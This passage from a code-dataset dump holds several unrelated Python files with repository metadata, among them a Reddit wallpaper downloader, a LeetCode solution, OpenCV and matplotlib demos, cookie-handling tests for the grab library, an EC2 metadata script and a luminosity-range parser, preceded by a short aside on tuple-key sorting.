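Editorial aside: the asserts in this sorting record exercise a two-level ordering (name ascending, ID descending) via Student.__lt__ and the repo's own Sorting.sort. For reference, the same orderings fall out of the standard-library sorted() with tuple keys; the tuples below are illustrative stand-ins for the Student objects, and descending ID is obtained by negating the numeric key component:

students = [(3, "st4"), (1, "st3"), (3, "st1"), (4, "st3"), (0, "st3")]
by_name_then_id = sorted(students, key=lambda s: (s[1], s[0]))
by_name_id_desc = sorted(students, key=lambda s: (s[1], -s[0]))
print(by_name_then_id)  # [(3, 'st1'), (0, 'st3'), (1, 'st3'), (4, 'st3'), (3, 'st4')]
print(by_name_id_desc)  # [(3, 'st1'), (4, 'st3'), (1, 'st3'), (0, 'st3'), (3, 'st4')]
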
\r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x: x.studentName)\r\n assert(l==[st2,st4,st3,st1])\r\n \r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x:x.studentName, reverse=True)\r\n assert(l==[st1,st3,st4,st2]) \r\n \r\n\r\n st1=Student(3,\"st1\")\r\n st2=Student(1,\"st3\")\r\n st3=Student(3,\"st4\")\r\n st4=Student(4,\"st3\")\r\n st5=Student(0,\"st3\")\r\n \r\n # sort by name,id ascending\r\n l = [st3, st2, st1, st4,st5]\r\n Sorting.sort(l, key=lambda x: (x.studentName, x.studentID))\r\n assert (l == [st1, st5,st2, st4, st3]) \r\n\r\n # sort by name ascending and by ID descending \r\n l = [st3, st2, st1, st4,st5]\r\n Sorting.sort(l)\r\n assert (l == [st1,st4,st2,st5,st3]) \r\n \r\n print(\"Sorting works!\") \r\n\r\n# #sort by name ascending and by ID descending with BubbleSort2\r\n# l = [st3, st2, st1, st4,st5]\r\n# Sorting.sort(l,algorithm=Algorithm.BUBBLE_SORT2)\r\n# assert (l == [st1,st4,st2,st5,st3]) \r\n# \r\n# \r\n# # sort by name ascending and by age descending with InsertionSort\r\n# l = [p3, p2, p1, p4]\r\n# Sorting.sort(l, algorithm=Algorithm.INSERTION_SORT)\r\n# assert (l == [p4, p1, p2, p3])\r\n \r\n# # sort by name ascending and by age descending with InsertionSort\r\n# l = [st3, st2, st1, st4,st5]\r\n# Sorting.sort(l,algorithm=Algorithm.INSERTION_SORT_REC)\r\n# assert (l == [st1,st4,st2,st5,st3])\r\n# \r\n# # sort by name ascending and by age descending with QuickSort\r\n# l = [st3, st2, st1, st4,st5]\r\n# Sorting.sort(l,algorithm=Algorithm.QUICK_SORT)\r\n# assert (l == [st1,st4,st2,st5,st3]) \r\n# \r\n# # sort by name ascending and by age descending with MergeSort\r\n# l = [p3, p2, p1, p4]\r\n# Sorting.sort(l, algorithm=Algorithm.MERGE_SORT)\r\n# assert (l == [p4, p1, p2, p3])\r\n# \r\n# print(\"hello world\")\r\n","repo_name":"IuliaRobas/StudentsRegisterManagement","sub_path":"src/sorting/algorithms/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72136185521","text":"from __future__ import print_function\nimport shutil\nimport urllib.request\nimport requests\nimport os\n\nsubreddits = [\n 'r/Wallpaper',\n 'r/Wallpapers',\n 'r/MinimalWallpaper', \n \n 'r/PixelArt',\n 'r/DigitalArt',\n 'r/ImaginaryLandscapes',\n 'r/Illustration'\n]\n\ndef getImage(i):\n curr_dir = os.getcwd()\n curr_dir = os.path.join(curr_dir,\"wallpapers\")\n file_name = i[2:] + '.png'\n if os.path.isfile(os.path.join(curr_dir,file_name)) == True:\n return \"-1\"\n url = f\"http://www.reddit.com/{i}/top.json?t=day\"\n query_params = {\n \"limit\":5\n }\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n r = requests.get(f\"{url}\",params=query_params , headers=headers)\n print(\"req code : \" + str(r.status_code))\n print(i)\n if r.status_code != 200:\n return \"-1\"\n else:\n res = r.json()\n print(len(res['data']['children']))\n for post in res['data']['children']:\n if 'preview' in post['data']: \n resolution_width = post['data']['preview']['images'][0]['resolutions'][-1]['width']\n url = post['data']['url']\n if post['data']['over_18'] == False and resolution_width == 1080 and (url.endswith('.png') or url.endswith('.jpg') or url.endswith('.gif')):\n print('url sent...')\n return url\n else:\n print(\"sry...\")\n\ndef downloadImage(i):\n url = \"\"\n url = getImage(i)\n \n if url != \"-1\" and url is not None:\n file_name = i[2:]+'.png'\n print(url)\n 
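Editorial aside: getImage() in this record queries Reddit's public .json listing with query params and a browser-like User-Agent. A pared-down sketch of that fetch — the subreddit name, limit, and User-Agent string are example values of mine, and the response shape ("data" -> "children" -> post "data") follows what the record itself parses:

import requests

def top_post_urls(subreddit, limit=5):
    resp = requests.get(
        f"https://www.reddit.com/r/{subreddit}/top.json",
        params={"t": "day", "limit": limit},
        headers={"User-Agent": "wallpaper-fetcher/0.1"},
        timeout=10,
    )
    resp.raise_for_status()
    posts = resp.json()["data"]["children"]
    return [p["data"]["url"] for p in posts]

# print(top_post_urls("wallpapers"))  # live network call, left commented out
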
curr_dir = os.getcwd()\n curr_dir = os.path.join(curr_dir,\"wallpapers\",file_name)\n urllib.request.urlretrieve(url,curr_dir)\n print(f\"{file_name} downloaded...\")\n\ndef deletePrevImages():\n curr_dir = os.getcwd()\n folder_name = \"wallpapers\"\n curr_path = os.path.join(curr_dir,folder_name)\n # print(curr_dir)\n print(curr_path)\n if os.path.isdir(curr_path):\n # os.removedirs(curr_path)\n shutil.rmtree(curr_path,ignore_errors=True)\n\n os.mkdir(curr_path)\n\ndeletePrevImages()\nfor i in range(50):\n for subreddit in subreddits:\n downloadImage(subreddit)\n\nprint(\"Done...\")","repo_name":"Hell3ringer/Reddit_Top_Wallpapers","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"30533360735","text":"# needed for python unit testings\n# https://docs.python.org/3/library/unittest.html\nimport unittest\n\n# required for type hinting\n# https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html\nfrom typing import List\n\nfrom collections import deque\n\nclass Solution:\n '''\n Given a string s and an integer k, a k duplicate removal consists of\n choosing k adjacent and equal letters from s and removing them,\n causing the left and right side of the deleted substring to\n concatenate together.\n\n Repeatedly make k duplicate removals on s until it is no longer\n possible to make a k duplicate removal.\n\n Return the final string after all such duplicate removals have been\n made. It is guaranteed that the answer is unique.\n '''\n def removeDuplicates(self, s: str, k: int) -> str:\n # works because s only contains lowercase english letters, would\n # have to change ' ' to a character that could not appear in\n # input string.\n d = deque([' '])\n for i in s:\n if i == d[-1][0]:\n d[-1] += i\n else:\n d.append(i)\n if len(d[-1]) >= k:\n d.pop()\n return ''.join(d)[1:]\n\nclass UnitTesting(unittest.TestCase):\n def test_one(self):\n s = Solution()\n i = \"abcd\"\n j = 2\n o = \"abcd\"\n self.assertEqual(s.removeDuplicates(i,j), o)\n\n def test_two(self):\n s = Solution()\n i = \"deeedbbcccbdaa\"\n j = 3\n o = \"aa\"\n self.assertEqual(s.removeDuplicates(i,j), o)\n\n def test_three(self):\n s = Solution()\n i = \"pbbcggttciiippooaais\"\n j = 2\n o = \"ps\"\n self.assertEqual(s.removeDuplicates(i,j), o)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)","repo_name":"olsenw/LeetCodeExercises","sub_path":"Python3/remove_all_adjacent_duplicates_in_string_ii.py","file_name":"remove_all_adjacent_duplicates_in_string_ii.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39672899278","text":"\nimport cv2\nimport numpy as np\noriginal_img = cv2.imread('/home/gzb/PycharmProjects/homework/data/4.1.jpeg')\nres = cv2.resize(original_img,None,fx=0.6, fy=0.6,\n interpolation = cv2.INTER_CUBIC) #图形太大了缩小一点\nB, G, R = cv2.split(res) #获取红色通道\nimg = R\n_,RedThresh = cv2.threshold(img,160,255,cv2.THRESH_BINARY)\n#OpenCV定义的结构矩形元素\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT,(3, 3))\neroded = cv2.erode(RedThresh,kernel) #腐蚀图像\ndilated = cv2.dilate(RedThresh,kernel) #膨胀图像\n\ncv2.imshow(\"original_img\", res) #原图像\ncv2.imshow(\"Eroded Image\",eroded) #显示腐蚀后的图像\ncv2.imshow(\"Dilated Image\",dilated) #显示膨胀后的图像\n\n# #NumPy定义的结构元素\nNpKernel = np.uint8(np.ones((3,3)))\nNperoded = cv2.erode(RedThresh,NpKernel) #腐蚀图像\n# cv2.imshow(\"Eroded by NumPy 
kernel\",Nperoded) #显示腐蚀后的图像\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"gzb126/Some-simple-handling-of-images","sub_path":"demo/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9765320722","text":"import json\nfrom flask import render_template, Blueprint\nfrom project.stats.process_classifications import get_data\n\n# define blueprints\nstats_blueprint = Blueprint(\n 'stats', __name__,\n template_folder='templates'\n)\n\n@stats_blueprint.route('/stats')\ndef index():\n #Justin, you can access the json through the variable json_data\n json_data = json.dumps(get_data())\n\n return render_template('stats.html', json_data=json_data)\n","repo_name":"LearnTeachCode/marsrocks","sub_path":"project/stats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"34728044590","text":"import json\nimport pickle\nfrom pprint import pprint # pylint: disable=unused-import\n\nfrom grab.cookie import CookieManager, create_cookie\nfrom grab.error import GrabMisuseError\nfrom test_server import Response\nfrom tests.util import BaseGrabTestCase, build_grab, temp_file\n\n\nclass TestCookies(BaseGrabTestCase):\n def setUp(self):\n self.server.reset()\n\n def test_parsing_response_cookies(self):\n grab = build_grab()\n self.server.add_response(\n Response(headers=[(\"Set-Cookie\", \"foo=bar\"), (\"Set-Cookie\", \"1=2\")])\n )\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n\n def test_multiple_cookies(self):\n grab = build_grab()\n self.server.add_response(Response())\n grab.setup(cookies={\"foo\": \"1\", \"bar\": \"2\"})\n grab.go(self.server.get_url())\n self.assertEqual(\n set((x.key, x.value) for x in self.server.request.cookies.values()),\n set([(\"foo\", \"1\"), (\"bar\", \"2\")]),\n )\n\n def test_session(self):\n # Test that if Grab gets some cookies from the server\n # then it sends it back\n grab = build_grab()\n grab.setup(reuse_cookies=True)\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertEqual(\n set([(\"foo\", \"bar\")]),\n set((x.key, x.value) for x in self.server.request.cookies.values()),\n )\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertEqual(\n set([(\"foo\", \"bar\")]),\n set((x.key, x.value) for x in self.server.request.cookies.values()),\n )\n\n # Test reuse_cookies=False\n grab = build_grab()\n grab.setup(reuse_cookies=False)\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertTrue(len(self.server.request.cookies) == 0)\n\n # Test something\n grab = build_grab()\n grab.setup(reuse_cookies=True)\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n grab.clear_cookies()\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertTrue(len(self.server.request.cookies) == 0)\n\n def test_redirect_session(self):\n grab = 
build_grab()\n self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=bar\")]))\n grab.go(self.server.get_url())\n self.assertEqual(grab.doc.cookies[\"foo\"], \"bar\")\n\n # Setup one-time redirect\n grab = build_grab()\n self.server.add_response(\n Response(\n headers=[\n (\"Location\", self.server.get_url()),\n (\"Set-Cookie\", \"foo=bar\"),\n ],\n status=302,\n )\n )\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n self.assertEqual(self.server.request.cookies[\"foo\"].value, \"bar\")\n\n def test_load_dump(self):\n with temp_file() as tmp_file:\n self.server.add_response(Response())\n grab = build_grab()\n cookies = {\"foo\": \"bar\", \"spam\": \"ham\"}\n grab.setup(cookies=cookies)\n grab.go(self.server.get_url())\n grab.cookies.save_to_file(tmp_file)\n with open(tmp_file, encoding=\"utf-8\") as inp:\n self.assertEqual(\n set(cookies.items()),\n set((x[\"name\"], x[\"value\"]) for x in json.load(inp)),\n )\n\n self.server.add_response(Response())\n grab = build_grab()\n cookies = {\"foo\": \"bar\", \"spam\": \"begemot\"}\n grab.setup(cookies=cookies)\n grab.go(self.server.get_url())\n grab.cookies.save_to_file(tmp_file)\n with open(tmp_file, encoding=\"utf-8\") as inp:\n self.assertEqual(\n set(cookies.items()),\n set((x[\"name\"], x[\"value\"]) for x in json.load(inp)),\n )\n\n # Test load cookies\n grab = build_grab()\n cookies = [\n {\"name\": \"foo\", \"value\": \"bar\", \"domain\": self.server.address},\n {\"name\": \"spam\", \"value\": \"begemot\", \"domain\": self.server.address},\n ]\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n json.dump(cookies, out)\n grab.cookies.load_from_file(tmp_file)\n self.assertEqual(\n set(grab.cookies.items()), set((x[\"name\"], x[\"value\"]) for x in cookies)\n )\n\n def test_cookiefile_empty(self):\n with temp_file() as tmp_file:\n self.server.add_response(Response())\n grab = build_grab()\n # Empty file should not raise Exception\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n out.write(\"\")\n grab.setup(cookiefile=tmp_file)\n grab.go(self.server.get_url())\n\n def test_cookiefile(self):\n with temp_file() as tmp_file:\n grab = build_grab()\n\n cookies = [{\"name\": \"spam\", \"value\": \"ham\", \"domain\": self.server.address}]\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n json.dump(cookies, out)\n\n # One cookie are sent in server response\n # Another cookies is passed via the `cookiefile` option\n self.server.add_response(\n Response(headers=[(\"Set-Cookie\", \"godzilla=monkey\")])\n )\n grab.setup(cookiefile=tmp_file, debug=True)\n grab.go(self.server.get_url())\n self.assertEqual(self.server.request.cookies[\"spam\"].value, \"ham\")\n\n # This is correct reslt of combining two cookies\n merged_cookies = [(\"godzilla\", \"monkey\"), (\"spam\", \"ham\")]\n\n # grab.cookies should contains merged cookies\n self.assertEqual(set(merged_cookies), set(grab.cookies.items()))\n\n # `cookiefile` file should contains merged cookies\n with open(tmp_file, encoding=\"utf-8\") as inp:\n self.assertEqual(\n set(merged_cookies),\n set((x[\"name\"], x[\"value\"]) for x in json.load(inp)),\n )\n\n # Just ensure it works\n self.server.add_response(Response())\n grab.go(self.server.get_url())\n\n # def test_manual_dns(self):\n # grab = build_grab()\n # USE CUSTOM DNS: [\"foo:%d:127.0.0.1\" % self.server.port]\n # self.server.add_response(Response(data=b\"zzz\"))\n # grab.go(\"http://foo:%d/\" % self.server.port)\n # self.assertEqual(b\"zzz\", grab.doc.body)\n\n # def 
test_different_domains(self):\n # grab = build_grab()\n # names = [\n # \"foo:%d:127.0.0.1\" % self.server.port,\n # \"bar:%d:127.0.0.1\" % self.server.port,\n # ]\n # grab.setup_transport()\n # USE CUSTOM DNS\n\n # self.server.add_response(Response(headers=[(\"Set-Cookie\", \"foo=foo\")]))\n # grab.go(\"http://foo:%d\" % self.server.port)\n # self.assertEqual(dict(grab.doc.cookies.items()), {\"foo\": \"foo\"})\n\n # self.server.add_response(Response(headers=[(\"Set-Cookie\", \"bar=bar\")]))\n # grab.go(\"http://bar:%d\" % self.server.port)\n # self.assertEqual(dict(grab.doc.cookies.items()), {\"bar\": \"bar\"})\n\n # # That does not hold anymore, I guess I have fixed it\n # # # response.cookies contains cookies from both domains\n # # # because it just accumulates cookies over time\n # # # self.assertEqual(\n # # # dict(grab.doc.cookies.items()), {\"foo\": \"foo\", \"bar\": \"bar\"}\n # # # )\n\n # def test_cookie_domain(self):\n # grab = build_grab()\n # USE CUSTOM NAMES: \"example.com:%d:127.0.0.1\" % self.server.port,\n # grab.cookies.set(\"foo\", \"bar\", domain=\"example.com\")\n # grab.go(\"http://example.com:%d/\" % self.server.port)\n\n def test_update_invalid_cookie(self):\n grab = build_grab()\n self.assertRaises(GrabMisuseError, grab.cookies.update, None)\n self.assertRaises(GrabMisuseError, grab.cookies.update, \"asdf\")\n self.assertRaises(GrabMisuseError, grab.cookies.update, [\"asdf\"])\n\n def test_from_cookie_list(self):\n cookie = create_cookie(\"foo\", \"bar\", self.server.address)\n mgr = CookieManager.from_cookie_list([cookie])\n test_cookie = [x for x in mgr.cookiejar if x.name == \"foo\"][0]\n self.assertEqual(cookie.name, test_cookie.name)\n\n mgr = CookieManager.from_cookie_list([])\n self.assertEqual(0, len(list(mgr.cookiejar)))\n\n def test_pickle_serialization(self):\n cookie = create_cookie(\"foo\", \"bar\", self.server.address)\n mgr = CookieManager.from_cookie_list([cookie])\n dump = pickle.dumps(mgr)\n mgr2 = pickle.loads(dump)\n self.assertEqual(list(mgr.cookiejar)[0].value, list(mgr2.cookiejar)[0].value)\n\n def test_get_item(self):\n cookie = create_cookie(\"foo\", \"bar\", self.server.address)\n mgr = CookieManager.from_cookie_list([cookie])\n self.assertEqual(\"bar\", mgr[\"foo\"])\n self.assertRaises(KeyError, lambda: mgr[\"zzz\"])\n\n # def test_dot_domain(self):\n # grab = build_grab(debug=True)\n # USE CUSTOM NAMES\n # \"foo.bar:%d:127.0.0.1\" % self.server.port,\n # \"www.foo.bar:%d:127.0.0.1\" % self.server.port,\n # ]\n # self.server.add_response(\n # Response(\n # headers=[\n # (\n # \"Set-Cookie\",\n # (\n # \"foo=foo; Domain=.foo.bar;\"\n # \" Expires=Wed, 13 Jan 3000 22:23:01 GMT;\"\n # ),\n # )\n # ]\n # ),\n # count=2,\n # )\n\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # self.assertEqual(dict(grab.doc.cookies.items()), {\"foo\": \"foo\"})\n # pprint(grab.doc.cookies.get_dict())\n\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # pprint(self.server.request)\n # self.assertEqual(\"foo\", self.server.request.cookies.get(\"foo\").value)\n\n def test_path(self):\n self.server.add_response(\n Response(\n headers=[\n (\"Set-Cookie\", \"foo=1; path=/;\"),\n (\"Set-Cookie\", \"bar=1; path=/admin;\"),\n ]\n )\n )\n\n # work with \"/\" path\n grab = build_grab()\n # get cookies\n grab.go(self.server.get_url(\"/\"))\n\n self.server.add_response(Response())\n # submit received cookies\n grab.go(self.server.get_url(\"/\"))\n self.assertEqual(1, len(self.server.request.cookies))\n\n self.server.add_response(Response())\n # 
work with \"/admin\" path\n grab.go(self.server.get_url(\"/admin/zz\"))\n self.assertEqual(2, len(self.server.request.cookies))\n\n # def test_common_case_www_domain(self):\n # grab = build_grab()\n # USE CUSTOM NAMES\n # \"www.foo.bar:%d:127.0.0.1\" % self.server.port,\n # ]\n # # Cookies are set for root domain (not for www subdomain)\n # self.server.add_response(\n # Response(\n # headers=[\n # (\"Set-Cookie\", \"foo=1; Domain=foo.bar;\"),\n # (\"Set-Cookie\", \"bar=2; Domain=.foo.bar;\"),\n # ]\n # )\n # )\n # self.server.add_response(Response())\n\n # # get cookies\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # # submit cookies\n # grab.go(\"http://www.foo.bar:%d\" % self.server.port)\n # self.assertEqual(\"1\", (self.server.request.cookies.get(\"foo\").value))\n # self.assertEqual(\"2\", (self.server.request.cookies.get(\"bar\").value))\n\n def test_cookie_merging_replace_with_cookies_option(self):\n with temp_file() as tmp_file:\n self.server.add_response(Response())\n init_cookies = [\n {\"name\": \"foo\", \"value\": \"bar\", \"domain\": self.server.address}\n ]\n with open(tmp_file, \"w\", encoding=\"utf-8\") as out:\n json.dump(init_cookies, out)\n\n grab = build_grab(debug=True)\n grab.cookies.load_from_file(tmp_file)\n\n cookies = {\n \"foo\": \"bar2\",\n \"sex\": \"male\",\n }\n\n grab.setup(cookies=cookies)\n grab.go(self.server.get_url())\n self.assertEqual(2, len(self.server.get_request().cookies))\n\n def test_cookie_merging_replace(self):\n grab = build_grab()\n grab.cookies.set(\"foo\", \"bar\", \"localhost\")\n grab.cookies.set(\"foo\", \"bar2\", \"localhost\")\n self.assertEqual(1, len(grab.cookies.items()))\n\n # Empty domain as same as localhost because internally\n # localhost replaced with empty string\n grab.cookies.set(\"foo\", \"bar3\", \"\")\n self.assertEqual(1, len(grab.cookies.items()))\n\n grab.cookies.set(\"foo\", \"bar2\", domain=\"ya.ru\")\n self.assertEqual(2, len(grab.cookies.items()))\n\n def test_unicode_cookie(self):\n grab = build_grab()\n\n def callback():\n return b\"HTTP/1.0 200 OK\\nSet-Cookie: preved=%s\\n\\n\" % \"медвед\".encode(\n \"utf-8\"\n )\n\n self.server.add_response(Response(raw_callback=callback))\n self.server.add_response(Response())\n # request page and receive unicode cookie\n grab.go(self.server.get_url())\n # request page one more time, sending cookie\n # should not fail\n grab.go(self.server.get_url())\n # does not work yet, because test_server does not correctly\n # display request unicode cookies\n # self.assertEqual(\n # u'медвед', self.server.request['cookies']['preved']['value']\n # )\n\n # def test_get_cookie_header(self):\n # mgr = CookieManager()\n # req = Request(\"https://example.com\", headers={\"Cookie\": \"foo=bar\"})\n # self.assertEqual(\"foo=bar\", mgr.get_cookie_header(req))\n","repo_name":"AMetIR/grab","sub_path":"tests/grab_cookies.py","file_name":"grab_cookies.py","file_ext":"py","file_size_in_byte":14543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"7843888690","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\ndef histgram():\n hist = []\n freq = defaultdict(int)\n\n for line in open(\"line_freq.txt\"):\n line = line.strip().split(\"\\t\")\n if line != None:\n hist.append(int(line[1]))\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(hist, bins = 100, range = (1, 200))\n\n plt.title('histgram')\n plt.xlabel(' Frequency ')\n plt.ylabel(' Number of types 
')\n ax.set_xlim(1, 200)\n ax.set_ylim(0, 500)\n plt.savefig('plt_5_049.png')\n plt.show()\n\nif __name__ == '__main__':\n histgram()\n","repo_name":"ymattsun/Advanced-NLP","sub_path":"5_049_histgram.py","file_name":"5_049_histgram.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5710194068","text":"# Import required modules\nimport boto3\nimport argparse\nimport json\n\ndef get_running_instance_ids(ec2_client):\n \"\"\"\n Collects the instance ID or IDs based on the filters provided.\n We can always change the filters based on our requirements.\n \"\"\"\n reservations = ec2_client.describe_instances(Filters=[\n {\n \"Name\": \"instance-state-name\",\n \"Values\": [\"running\"],\n }\n ]).get(\"Reservations\")\n\n \"\"\"\n Instances are associated with a reservation:\n >>> instances = reservations[0].instances\n >>> instances\n [Instance:i-00000000]\n \"\"\"\n\n instance_ids = []\n for reservation in reservations:\n for instance in reservation[\"Instances\"]:\n instance_ids.append(instance[\"InstanceId\"])\n return instance_ids\n\ndef print_instance_as_json(ec2_client, instance_ids, key):\n \"\"\"\n Prints the instance metadata in JSON format.\n \"\"\"\n reservations = ec2_client.describe_instances(InstanceIds=instance_ids).get(\"Reservations\")\n for reservation in reservations:\n for instance in reservation['Instances']:\n if key is None:\n print(json.dumps(reservation, indent=4, sort_keys=True, default = str))\n else:\n print(instance.get(key))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Output AWS instance metadata as JSON, or output the value of a particular key')\n parser.add_argument('--key', type=str, help=\"Provide the key you want the value for\")\n parser.add_argument('--instance', type=str, help=\"instance id\")\n parser.add_argument('--region', type=str, help=\"region\", default=\"us-east-1\")\n\n args = parser.parse_args()\n\n ec2_client = boto3.client(\"ec2\", region_name=args.region)\n\n if args.instance:\n instance_ids = [args.instance]\n else:\n instance_ids = get_running_instance_ids(ec2_client)\n\n print_instance_as_json(ec2_client, instance_ids, args.key)\n","repo_name":"crazytechie1990/KPMG_Interview","sub_path":"Challenge2/aws-ec2-meta.py","file_name":"aws-ec2-meta.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38682600067","text":"def makeint(x):\n\tif x.strip().upper() not in ['', 'MAX', 'MIN']:\n\t\treturn int(x)\n\n\ndef parseLumiFromJSON(data, select = ''):\n\truns = eval(data)\n\trr = map(makeint, select.split('-') + [''])[:2]\n\tfor run in map(int, runs.keys()):\n\t\tif (rr[0] and run < rr[0]) or (rr[1] and run > rr[1]):\n\t\t\tcontinue\n\t\tfor lumi in runs[str(run)]:\n\t\t\tyield ([run, lumi[0]], [run, lumi[1]])\n\n\ndef cmpLumi(a, b):\n\t(start_a_run, start_a_lumi) = a[0]\n\t(start_b_run, start_b_lumi) = b[0]\n\tif start_a_run == start_b_run:\n\t\treturn cmp(start_a_lumi, start_b_lumi)\n\treturn cmp(start_a_run, start_b_run)\n\n\ndef mergeLumi(rlrange):\n\t\"\"\" Merge consecutive lumi sections\n\t>>> mergeLumi([([1, 11], [1, 20]), ([1, 1], [1, 10]), ([1, 22], [1, 30])])\n\t[([1, 1], [1, 20]), ([1, 22], [1, 30])]\n\t>>> mergeLumi([([1, 1], [2, 2]), ([2, 3], [2, 10]), ([2, 11], [4, 30])])\n\t[([1, 1], [4, 30])]\n\t\"\"\"\n\trlrange = sorted(rlrange, cmpLumi)\n\ti = 0\n\twhile i < len(rlrange) - 
1:\n\t\t(end_run, end_lumi) = rlrange[i][1]\n\t\t(start_next_run, start_next_lumi) = rlrange[i+1][0]\n\t\tif (end_run == start_next_run) and (end_lumi == start_next_lumi - 1):\n\t\t\trlrange[i] = (rlrange[i][0], rlrange[i + 1][1])\n\t\t\tdel rlrange[i+1]\n\t\telse:\n\t\t\ti += 1\n\treturn rlrange\n\n\ndef parseLumiFromString(rlrange):\n\t\"\"\" Parse user supplied lumi info into easier to handle format\n\t>>> map(parseLumiFromString, ['1', '1-', '-1', '1-2'])\n\t[([1, None], [1, None]), ([1, None], [None, None]), ([None, None], [1, None]), ([1, None], [2, None])]\n\t>>> map(parseLumiFromString, ['1:5', '1:5-', '-1:5', '1:5-2:6'])\n\t[([1, 5], [1, 5]), ([1, 5], [None, None]), ([None, None], [1, 5]), ([1, 5], [2, 6])]\n\t>>> map(parseLumiFromString, ['1-:5', ':5-1', ':5-:6'])\n\t[([1, None], [None, 5]), ([None, 5], [1, None]), ([None, 5], [None, 6])]\n\t>>> map(parseLumiFromString, ['1:5-2', '1-2:5'])\n\t[([1, 5], [2, None]), ([1, None], [2, 5])]\n\t\"\"\"\n\tdef parseRunLumi(rl):\n\t\tif ':' in rl:\n\t\t\treturn map(makeint, rl.split(':'))\n\t\telse:\n\t\t\treturn [makeint(rl), None]\n\tif '-' in rlrange:\n\t\treturn tuple(map(parseRunLumi, rlrange.split('-')))\n\telse:\n\t\ttmp = parseRunLumi(rlrange)\n\t\treturn (tmp, tmp)\n\n\ndef parseLumiFilter(lumiexpr):\n\tif lumiexpr == '':\n\t\treturn None\n\n\tlumis = []\n\timport os, grid_control\n\tfor token in map(str.strip, lumiexpr.split(',')):\n\t\ttoken = map(str.strip, token.split('|'))\n\t\tif os.path.exists(token[0]):\n\t\t\ttry:\n\t\t\t\tif len(token) == 1:\n\t\t\t\t\ttoken.append('')\n\t\t\t\tlumis.extend(parseLumiFromJSON(open(token[0]).read(), token[1]))\n\t\t\texcept:\n\t\t\t\traise grid_control.ConfigError('Could not process lumi filter file:\\n%s' % token)\n\t\telse:\n\t\t\ttry:\n\t\t\t\tlumis.append(parseLumiFromString(token[0]))\n\t\t\texcept:\n\t\t\t\traise grid_control.ConfigError('Could not process lumi filter expression:\\n%s' % token[0])\n\treturn mergeLumi(lumis)\n\n\ndef filterLumiFilter(runs, lumifilter):\n\t\"\"\" Yield the lumi filter entries that cover at least one of the given runs\n\t>>> formatLumi(filterLumiFilter([2,3,6], [([1, None], [2, None]), ([4, 1], [4, None]), ([5, 1], [None,3])]))\n\t['1:MIN-2:MAX', '5:1-9999999:3']\n\t>>> formatLumi(filterLumiFilter([2,3,6], [([1, 1], [2, 2]), ([3, 1], [5, 2]), ([5, 2], [7,3])]))\n\t['1:1-2:2', '3:1-5:2', '5:2-7:3']\n\t\"\"\"\n\tfor filterEntry in lumifilter:\n\t\t(sel_start, sel_end) = (filterEntry[0][0], filterEntry[1][0])\n\t\tfor run in runs:\n\t\t\tif (sel_start == None) or (run >= sel_start):\n\t\t\t\tif (sel_end == None) or (run <= sel_end):\n\t\t\t\t\tyield filterEntry\n\n\ndef selectLumi(run_lumi, lumifilter):\n\t\"\"\" Check if lumifilter selects the given run/lumi\n\t>>> selectLumi((1,2), [([1, None], [2, None])])\n\tTrue\n\t>>> selectLumi((1,2), [([1, 3], [5, 12])])\n\tFalse\n\t>>> selectLumi((2,1), [([1, 3], [5, 12])])\n\tTrue\n\t>>> selectLumi((9,2), [([3, 23], [None, None])])\n\tTrue\n\t\"\"\"\n\t(run, lumi) = run_lumi\n\tfor (sel_start, 